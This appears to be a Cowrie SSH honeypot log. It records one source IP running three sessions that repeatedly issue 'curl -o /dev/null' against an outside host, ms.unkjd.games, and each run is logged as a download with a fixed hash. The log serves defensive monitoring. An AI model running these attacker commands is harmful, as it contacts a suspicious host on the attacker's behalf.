{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.712430Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.717488Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.718956Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.719627Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.721564Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.722193Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.728516Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.781990Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.784429Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.787114Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.788680Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.789757Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.792205Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.792953Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.794656Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.795469Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.798673Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.834209Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.835504Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.836382Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.841856Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.843164Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.843786Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.865738Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.866379Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.869841Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.872250Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.872957Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.875636Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.878515Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.879977Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.880676Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.905882Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.907024Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.907851Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.911802Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.913296Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.914069Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.921522Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.922505Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.947654Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.948674Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.949132Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.952320Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.954150Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.954860Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.958404Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.958874Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.961638Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.991241Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.992328Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.993191Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.996720Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.999471Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.000987Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.001635Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.006528Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.007319Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.041345Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.043316Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.047138Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.048477Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.049544Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.061752Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.062485Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.081624Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.082321Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.086275Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.088378Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.090236Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.091199Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.094927Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.113590Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.114271Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.117073Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.123768Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.124500Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.127528Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
